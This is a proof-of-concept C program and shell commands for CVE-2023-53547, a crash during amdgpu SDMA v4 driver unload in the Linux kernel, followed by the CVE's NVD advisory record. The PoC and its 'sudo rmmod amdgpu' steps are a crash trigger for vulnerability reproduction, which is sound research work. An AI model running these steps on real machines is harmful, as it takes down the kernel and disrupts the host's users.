CVE-2023-53547

// CVE-2023-53547 PoC - Trigger amdgpu SDMA v4 sw_fini crash // This PoC triggers the vulnerability by loading and unloading the amdgpu // driver on a system with AMD SDMA 4.2.2 hardware #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/stat.h> // Step 1: Ensure amdgpu module is loaded // Run: modprobe amdgpu // This initializes the SDMA v4 firmware contexts // Step 2: Access the AMD GPU device to trigger initialization int trigger_vulnerability() { int fd; // Open the AMD GPU render node // This triggers SDMA instance context creation fd = open("/dev/dri/renderD128", O_RDWR); if (fd < 0) { perror("Failed to open GPU device"); return -1; } printf("GPU device opened, SDMA contexts initialized\n"); close(fd); return 0; } // Step 3: Unload the amdgpu module to trigger sw_fini // Run: rmmod amdgpu // This will call sdma_v4_0_sw_fini() -> amdgpu_sdma_destroy_inst_ctx() // -> amdgpu_ucode_release() -> release_firmware() -> free_fw_priv() // which triggers the general protection fault int main() { printf("CVE-2023-53547 PoC - amdgpu SDMA v4 sw_fini crash\n"); printf("WARNING: This will crash the kernel on vulnerable systems\n"); // Trigger SDMA context initialization if (trigger_vulnerability() != 0) { return 1; } printf("Now run 'rmmod amdgpu' to trigger the crash\n"); printf("Or run: sudo rmmod amdgpu\n"); return 0; } // Shell-based trigger: // $ sudo modprobe amdgpu // $ ls /dev/dri/renderD* # Trigger device access // $ sudo rmmod amdgpu # This triggers the GP fault in free_fw_priv+0xd/0x70

{"cve": {"id": "CVE-2023-53547", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:49.907", "lastModified": "2026-03-21T00:32:30.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Fix sdma v4 sw fini error\n\nFix sdma v4 sw fini error for sdma 4.2.2 to\nsolve the following general protection fault\n\n[ +0.108196] general protection fault, probably for non-canonical\naddress 0xd5e5a4ae79d24a32: 0000 [#1] PREEMPT SMP PTI\n[ +0.000018] RIP: 0010:free_fw_priv+0xd/0x70\n[ +0.000022] Call Trace:\n[ +0.000012] <TASK>\n[ +0.000011] release_firmware+0x55/0x80\n[ +0.000021] amdgpu_ucode_release+0x11/0x20 [amdgpu]\n[ +0.000415] amdgpu_sdma_destroy_inst_ctx+0x4f/0x90 [amdgpu]\n[ +0.000360] sdma_v4_0_sw_fini+0xce/0x110 [amdgpu]"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.30", "matchCriteriaId": "47F596CE-500C-40C1-B50B-6C4596C2A9A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.4", "matchCriteriaId": "26C54BF0-3EED-46D4-92A7-5F07F658B49B"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0ebc02d9ff85626a526353584526da6aa9c96792", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/210ef6cd8e634f18fd889421012192b81325b27b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5e08e9c742a00384e5abe74bd40cf4dc15cb3a2e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}